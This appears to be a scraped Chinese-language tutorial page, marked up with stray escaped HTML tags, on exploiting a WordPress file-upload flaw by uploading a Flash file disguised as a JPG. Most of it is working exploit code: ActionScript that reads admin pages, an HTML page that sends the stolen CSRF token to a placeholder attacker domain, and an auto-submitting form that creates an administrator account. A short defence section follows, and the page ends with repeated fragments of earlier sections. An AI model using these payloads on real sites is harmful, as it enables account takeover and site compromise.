WordPress文件上传漏洞分析与利用教学<\/h1>

漏洞背景<\/h2>
WordPress作为全球最流行的开源CMS系统，拥有数百万用户和4600万次下载量。其安全性至关重要，因为一旦被攻破将影响大量网站。本教学将详细分析一个通过文件上传功能实现权限提升的漏洞。<\/p>

技术原理<\/h2>

核心漏洞点<\/h3>

漏洞利用的是WordPress文件上传功能中对getimagesize()<\/code>函数的错误使用：<\/p>


getimagesize()<\/code>函数可以处理多种文件类型，包括SWF(Flash)文件<\/li>
WordPress仅通过该函数验证文件类型，而未进行更严格的检查<\/li>
攻击者可以将恶意SWF文件伪装成JPG文件上传<\/li>
<\/ol>
文件上传流程<\/h3>
WordPress使用以下函数验证上传文件：<\/p>

getimagesize()<\/code> - PHP内置函数<\/li>
wp_check_filetype_and_ext()<\/code> - WordPress函数<\/li>
wp_check_filetype()<\/code> - WordPress函数<\/li>
<\/ul>
这些函数主要依赖文件头信息而非扩展名来判断文件类型。<\/p>
漏洞利用步骤<\/h2>
1. 准备恶意Flash文件<\/h3>
创建一个简单的Flash文件，包含以下ActionScript代码(wp_poc.as<\/code>)：<\/p>
package<\/span> {
<\/span><\/span>    import<\/span> flash<\/span>.display<\/span>.*;<\/span>
<\/span><\/span>    import<\/span> flash<\/span>.external<\/span>.ExternalInterface;<\/span>
<\/span><\/span>    import<\/span> flash<\/span>.net<\/span>.*;<\/span>
<\/span><\/span>    import<\/span> flash<\/span>.system<\/span>.Security;<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> class<\/span> wp_poc<\/span> extends<\/span> Sprite {
<\/span><\/span>        public<\/span> function<\/span> wp_poc<\/span>() {
<\/span><\/span>            Security.allowDomain<\/span>("*"<\/span>);
<\/span><\/span>            var<\/span> paramObj<\/span>:<\/span>Object =<\/span> LoaderInfo(this<\/span>.root<\/span>.loaderInfo<\/span>).parameters<\/span>;<\/span>
<\/span><\/span>            var<\/span> req<\/span>:<\/span>URLRequest =<\/span> new<\/span> URLRequest(paramObj<\/span>.input<\/span>);
<\/span><\/span>            var<\/span> loader<\/span>:<\/span>URLLoader =<\/span> new<\/span> URLLoader();
<\/span><\/span>            loader<\/span>.dataFormat<\/span> =<\/span> URLLoaderDataFormat.TEXT<\/span>;<\/span>
<\/span><\/span>            loader<\/span>.addEventListener<\/span>(Event.COMPLETE<\/span>,<\/span> onComplete<\/span>);
<\/span><\/span>            loader<\/span>.load<\/span>(req<\/span>);
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        private<\/span> function<\/span> onComplete<\/span>(event<\/span>:<\/span>Event):<\/span>void<\/span> {
<\/span><\/span>            ExternalInterface.call<\/span>("stealtoken"<\/span>,<\/span> event<\/span>.target<\/span>.data<\/span>);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>使用Flex SDK编译：<\/p>
mxmlc.exe wp_poc.as
<\/code><\/pre>
2. 伪装文件类型<\/h3>
将生成的wp_poc.swf<\/code>重命名为wp_poc.jpg<\/code>，保留SWF文件头(CWS)但使用JPG扩展名。<\/p>
3. 上传文件<\/h3>
以"作者"权限登录WordPress，访问\/wp-admin\/media-new.php<\/code>上传伪装的文件。<\/p>
4. 创建攻击页面<\/h3>
编写HTML文件(steal.html<\/code>)触发漏洞：<\/p>
<html<\/span>>
<\/span><\/span><head<\/span>>
<\/span><\/span><title<\/span>>WP PoC!<\/title<\/span>>
<\/span><\/span><script<\/span>>
<\/span><\/span>function<\/span> stealtoken<\/span>(data<\/span>) {
<\/span><\/span>    var<\/span> str<\/span> =<\/span> data<\/span>;
<\/span><\/span>    var<\/span> n<\/span> =<\/span> str<\/span>.lastIndexOf<\/span>('wpnonce_create-user'<\/span>);
<\/span><\/span>    var<\/span> result<\/span> =<\/span> str<\/span>.substring<\/span>(n<\/span> +<\/span> 28<\/span>, n<\/span>+<\/span>28<\/span>+<\/span>10<\/span>);
<\/span><\/span>    alert<\/span>('Your token is '<\/span> +<\/span> result<\/span>);
<\/span><\/span>    document.location<\/span>=<\/span>"http:\/\/ATTACKER-DOMAIN\/wordpress_csrf.php?token="<\/span>+<\/span>result<\/span>;
<\/span><\/span>}
<\/span><\/span><\/script<\/span>>
<\/span><\/span><object<\/span> id<\/span>=<\/span>"myObject"<\/span> width<\/span>=<\/span>"100"<\/span> height<\/span>=<\/span>"100"<\/span> 
<\/span><\/span>        allowscriptaccess<\/span>=<\/span>"always"<\/span> 
<\/span><\/span>        type<\/span>=<\/span>"application\/x-shockwave-flash"<\/span> 
<\/span><\/span>        data<\/span>=<\/span>"http:\/\/target-site\/wp-content\/uploads\/2017\/10\/wp_poc.jpg?input=http:\/\/target-site\/wp-admin\/user-new.php"<\/span>>
<\/span><\/span><param<\/span> name<\/span>=<\/span>"AllowScriptAccess"<\/span> value<\/span>=<\/span>"always"<\/span>>
<\/span><\/span><\/object<\/span>>
<\/span><\/span><\/code><\/pre>5. CSRF攻击<\/h3>
创建CSRF攻击页面(wordpress_csrf.php<\/code>)：<\/p>
<form<\/span> method<\/span>=<\/span>"POST"<\/span> name<\/span>=<\/span>"csrf"<\/span> action<\/span>=<\/span>"http:\/\/target-site\/wp-admin\/user-new.php"<\/span>>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"action"<\/span> value<\/span>=<\/span>"createuser"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"_wpnonce_create-user"<\/span> value<\/span>=<\/span>"<?php echo $_GET['token'];?>"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"_wp_http_referer"<\/span> value<\/span>=<\/span>"\/wordpress\/wp-admin\/user-new.php"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"user_login"<\/span> value<\/span>=<\/span>"Attacker"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"email"<\/span> value<\/span>=<\/span>"attacker@example.com"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"first_name"<\/span> value<\/span>=<\/span>"evil"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"last_name"<\/span> value<\/span>=<\/span>"hacker"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"url"<\/span> value<\/span>=<\/span>""<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"pass1"<\/span> value<\/span>=<\/span>"P@ssw0rd123"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"pass2"<\/span> value<\/span>=<\/span>"P@ssw0rd123"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"send_user_notification"<\/span> value<\/span>=<\/span>"1"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"role"<\/span> value<\/span>=<\/span>"administrator"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"createuser"<\/span> value<\/span>=<\/span>"Add New User"<\/span> \/>
<\/span><\/span><\/form<\/span>>
<\/span><\/span><script<\/span>>document.forms<\/span>["csrf"<\/span>].submit<\/span>();<\/script<\/span>>
<\/span><\/span><\/code><\/pre>漏洞利用流程<\/h2>

攻击者上传伪装成JPG的SWF文件<\/li>
受害者访问恶意HTML页面<\/li>
页面加载伪装的SWF文件<\/li>
SWF文件读取WordPress后台页面(如同源请求)<\/li>
提取CSRF token并发送给攻击者<\/li>
攻击者使用token创建管理员账户<\/li>
<\/ol>
防御措施<\/h2>


文件验证改进<\/strong>：<\/p>

不应仅依赖getimagesize()<\/code>验证文件类型<\/li>
应检查文件实际内容与扩展名是否匹配<\/li>
<\/ul>
<\/li>

权限控制<\/strong>：<\/p>

限制低权限用户上传特定文件类型<\/li>
对上传文件进行内容扫描<\/li>
<\/ul>
<\/li>

安全配置<\/strong>：<\/p>

使用CDN托管用户上传内容<\/li>
设置正确的Content-Type头<\/li>
<\/ul>
<\/li>

WordPress修复<\/strong>：<\/p>

该漏洞已被WordPress官方修复(CVE已分配)<\/li>
建议保持WordPress版本最新<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
本漏洞展示了如何通过精心构造的文件上传绕过WordPress的安全检查，最终实现权限提升。关键点在于：<\/p>

利用getimagesize()<\/code>对SWF文件的识别特性<\/li>
通过伪装文件扩展名绕过上传限制<\/li>
利用同源策略和Flash的脚本访问权限窃取敏感信息<\/li>
<\/ul>
此案例强调了严格文件验证的重要性，以及不能仅依赖客户端或简单服务器端检查来保证安全性。<\/p>

WordPress文件上传漏洞分析与利用教学<\/h1>

漏洞背景<\/h2> WordPress作为全球最流行的开源CMS系统，拥有数百万用户和4600万次下载量。其安全性至关重要，因为一旦被攻破将影响大量网站。本教学将详细分析一个通过文件上传功能实现权限提升的漏洞。<\/p>

技术原理<\/h2>

漏洞利用步骤<\/h2>

2. 伪装文件类型<\/h3> 将生成的wp_poc.swf<\/code>重命名为wp_poc.jpg<\/code>，保留SWF文件头(CWS)但使用JPG扩展名。<\/p>

漏洞背景<\/h2>
WordPress作为全球最流行的开源CMS系统，拥有数百万用户和4600万次下载量。其安全性至关重要，因为一旦被攻破将影响大量网站。本教学将详细分析一个通过文件上传功能实现权限提升的漏洞。<\/p>

2. 伪装文件类型<\/h3>
将生成的`wp_poc.swf<\/code>重命名为wp_poc.jpg<\/code>，保留SWF文件头(CWS)但使用JPG扩展名。<\/p>`